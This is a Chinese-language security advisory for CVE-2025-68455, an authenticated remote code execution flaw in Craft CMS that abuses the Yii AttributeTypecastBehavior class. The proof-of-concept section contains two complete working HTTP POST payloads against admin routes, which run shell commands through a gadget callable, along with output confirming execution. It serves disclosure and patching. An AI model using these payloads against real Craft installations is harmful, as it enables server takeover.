CVE-2025-68455: Craft CMS 存在认证后远程代码执行漏洞
漏洞描述
请注意,攻击者必须拥有Craft控制面板的管理员访问权限才能利用此漏洞。 用户应更新到已修复的版本(5.8.21 和 4.16.17)以缓解此问题。
摘要
该漏洞最初于8月7日被报告为Yii框架中的漏洞。Yii框架团队否认对此负责(将责任归于应用程序开发人员),因此尚未(且似乎不会)在框架层面提供修复。因此,我向Craft报告此问题,因为我发现它影响了Craft CMS的最新(5.6.0)版本。
通过利用一个合法但恶意构造的Yii Behavior类,可以在被污染的Behavior附加到Yii Component且在该Component上触发事件时,通过Reflection触发远程代码执行(RCE)。
细节
该漏洞的灵感来源于CVE-2024-4990,但有所不同,因为它使用了一个合法的Yii Behavior类,通过滥用魔术方法 __set() 和 __get() 来触发任意PHP可调用对象,最终导致RCE。因此,它绕过了针对CVE-2024-4990和相关CVE-2024-58136实施的缓解措施。
通过在JSON POST输入中使用 as <behavior> 语法,可以将Behavior类附加到Yii Component,这是CVE-2024-4990中发现的漏洞核心。针对该漏洞及相关CVE-2024-58136的修复确保了只有Behavior类型的类才能附加到Component。Craft CMS还实施了额外的逻辑,以防止任意Behavior类附加到易受攻击的Component。
现已识别出一种新的漏洞,它通过使用一个合法但特殊构造的Behavior类,即 yii\behaviors\AttributeTypecastBehavior,绕过了针对先前漏洞的修复。附加此类Behavior允许攻击者定义一个任意可调用对象,如果任何事件在被污染的Component上触发,该可调用对象就会被触发。
使用通配符事件监听器(在JSON输入中指定为 on *)允许攻击者捕获在被污染的Component上调用的任何事件,并将控制流重定向到调用 AttributeTypecastBehavior 的 self::beforeSave,从而触发攻击者定义的可调用对象,导致RCE。
参见下方带有注释的载荷:
|
|
经发现,该漏洞影响了Craft CMS管理功能中的两个独立控制器/路由,但可能还有其他受影响的部分:
/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview
概念验证(PoC)
-
通过Composer安装Craft CMS:
1$ composer create-project "craftcms/craft" app -
使用内置服务器启动Craft CMS:
1$ ./craft serve 127.0.0.1:9090 -
以下HTTP跟踪显示了用于在每个易受攻击的路由上触发漏洞的载荷:
针对
/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1 Host: 127.0.0.1:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0 ... (其他请求头) ... Content-Type: application/json ... (其他请求头) ... {"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] }, "typecastBeforeSave": "touch /tmp/touch111" } ] }, "on *": "self::beforeSave" },"settingsNamespace":null,"settings":null}针对
/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1 Host: 127.0.0.1:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0 ... (其他请求头) ... Content-Type: application/json ... (其他请求头) ... {"fieldLayoutConfig":{ "as xxx": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] }, "typecastBeforeSave": "touch /tmp/touch222" } ] }, "on *": "self::beforeSave" },"cardElements":[],"showThumb":null,"thumbAlignment":"end"} -
检查文件系统以确认在
/tmp目录中创建了两个文件,从而确认RCE:1 2 3 4$ ls -la /tmp/ ... -rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch111 -rw-rw-r-- 1 calum calum 0 Nov 19 16:05 touch222
影响
能够访问Craft CMS管理功能(特别是上述列出路由)的攻击者可以触发后端服务器的RCE,并可能获得服务器的控制权。
受影响版本
- Composer包:
craftcms/cms - 受影响版本:
>= 5.0.0-RC1, <= 5.8.20>= 4.0.0-RC1, <= 4.16.16
- 已修复版本:
5.8.214.16.17
参考
- GHSA-255j-qw47-wjh5
- craftcms/cms@27f5588
- craftcms/cms@6e608a1
- craftcms/cms@ec43c49
- https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
- https://nvd.nist.gov/vuln/detail/CVE-2025-68455
致谢
报告者: chutchut